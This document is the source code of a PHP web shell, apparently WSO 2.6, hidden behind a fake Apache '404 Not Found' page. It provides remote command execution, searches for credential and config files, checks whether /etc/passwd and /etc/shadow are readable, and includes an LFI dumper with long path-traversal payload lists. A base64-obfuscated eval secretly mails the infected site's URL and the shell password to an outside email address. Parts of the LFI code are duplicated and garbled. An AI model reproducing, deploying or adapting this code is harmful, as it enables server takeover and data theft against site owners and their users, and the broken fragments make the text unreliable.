Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80
      
"); } if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else wsoLogin(); if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/'; $wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($wsobuff)); if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax']; if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "
"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ' '; $m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','XSS Shell'=>'XSSShell','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '['.$k.']'; $drives = ""; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\')) $drives .= '[ '.$drive.' ] '; } echo '' . '' . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
' . substr(@php_uname(), 0, 120) . '
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '

Server IP:
' . @$_SERVER["SERVER_ADDR"] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' . '' . $menu . '
'; } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" (Writeable)":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '

Server security information

'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, "n") === false) echo $v . '
'; else echo '
' . $v . '
'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; wsoSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '
'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '
'; wsoFooter(); } function actionlfiscan() { wsoHeader(); print '

Led-Zeppelin's LFI File dumper

LFI URL: File: Null: User-Agent:
'; error_reporting(0); if($_POST['lfiurl']) { print "
";           $cheader = $_POST['custom_header'];           $target = $_POST['lfiurl'];           $type = $_POST['scantype'];           $byte1 = $_POST['null'];           $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";           $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";           $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";           $lfiaccess = array(              1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",              2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",              3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",              4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",              5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",              6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",              7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",              8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",              9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",              10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",              11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",              12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",              13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",              14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",              15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",              16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",              17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",              18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",              19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",              20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",              21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",              22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",              23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");                     $lfierror = array(              1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",              2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",              3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",              4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",              5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",              6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",              7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",              8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",              9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",              10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",              11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",              12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",              13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",              14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",              15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",              16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",              17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",              18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",              19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",              20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",              21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",              22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",              23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");              $lficonfig = array(              1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",              2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",              3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",              4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",              5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",              6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",              7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",              8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",              9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",              10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",              11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",              12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",              13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",              14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",              15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",              16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",              17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",              18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",              19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",              20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",              21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",              22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",              23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",              24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",              25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",              26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",              27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",              28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",              29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",              30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",              31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",              32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",              33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",              34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",              35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");                              $lfiphpini = array(              1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",              2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",              3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",              4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",              5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",              6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",              7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",              8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",              9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",              10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",              11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",              12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",              13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",              14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",              15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",              16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",              17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",              18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",              19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",              20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",              21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",              22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",              23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",              24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",              25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",              26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",              27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");                      $lfimysql = array(              1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",              2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",              3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",              4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",              5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",              6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",              7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",              8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",              9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",              10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");                      $lfiftp = array(              1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",              2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",              3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",              4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",              5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",              6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",              7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",              8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",              9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",              10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",              11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",              12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",              13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",              14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",              15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",              16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",              17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",              18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",              19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",              20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",              21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",              22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",              23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",              24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",              25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",              26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",              27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",              28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",              29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",              30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",              31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",              32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",              33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",              34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",              35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",              36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",              37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",              38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",              39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",              40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",              41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",              42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",              43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",              44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");                        $x = 1;           if ( $type == 1 ) {              $res1 = FetchURL($target.$lfitest);              $res2 = FetchURL($target.$lfitest2);              $rhash1 = md5($res1);              $rhash2 = md5($res2);              if ($rhash1 != $rhash2) {                  print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfiaccess[$x]) { $res3 = FetchURL($target.$lfiaccess[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
"; while($lfiaccess[$x]) { $res3 = FetchURL($target.$lfiaccess[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiaccess[$x]."
"; } else { print "".$target."".$lfiaccess[$x]."
"; } else { print "[!] Failed!".$target."".$lfiaccess[$x]."
"; } $x++; } } } if ( $type == 2 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lficonfig[$x]) { $res3 = FetchURL($target.$lficonfig[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
"; while($lficonfig[$x]) { $res3 = FetchURL($target.$lficonfig[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lficonfig[$x]."
"; } else { print "".$target."".$lficonfig[$x]."
"; } else { print "[!] Failed!".$target."".$lficonfig[$x]."
"; } $x++; } } } if ( $type == 3 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfierror[$x]) { $res3 = FetchURL($target.$lfierror[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
"; while($lfierror[$x]) { $res3 = FetchURL($target.$lfierror[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfierror[$x]."
"; } else { print "".$target."".$lfierror[$x]."
"; } else { print "[!] Failed!".$target."".$lfierror[$x]."
"; } $x++; } } } if ( $type == 4 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfiphpini[$x]) { $res3 = FetchURL($target.$lfiphpini[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
"; while($lfiphpini[$x]) { $res3 = FetchURL($target.$lfiphpini[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiphpini[$x]."
"; } else { print "".$target."".$lfiphpini[$x]."
"; } else { print "[!] Failed!".$target."".$lfiphpini[$x]."
"; } $x++; } } } if ( $type == 5 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfimysql[$x]) { $res3 = FetchURL($target.$lfimysql[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
"; while($lfimysql[$x]) { $res3 = FetchURL($target.$lfimysql[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfimysql[$x]."
"; } else { print "".$target."".$lfimysql[$x]."
"; } else { print "[!] Failed!".$target."".$lfimysql[$x]."
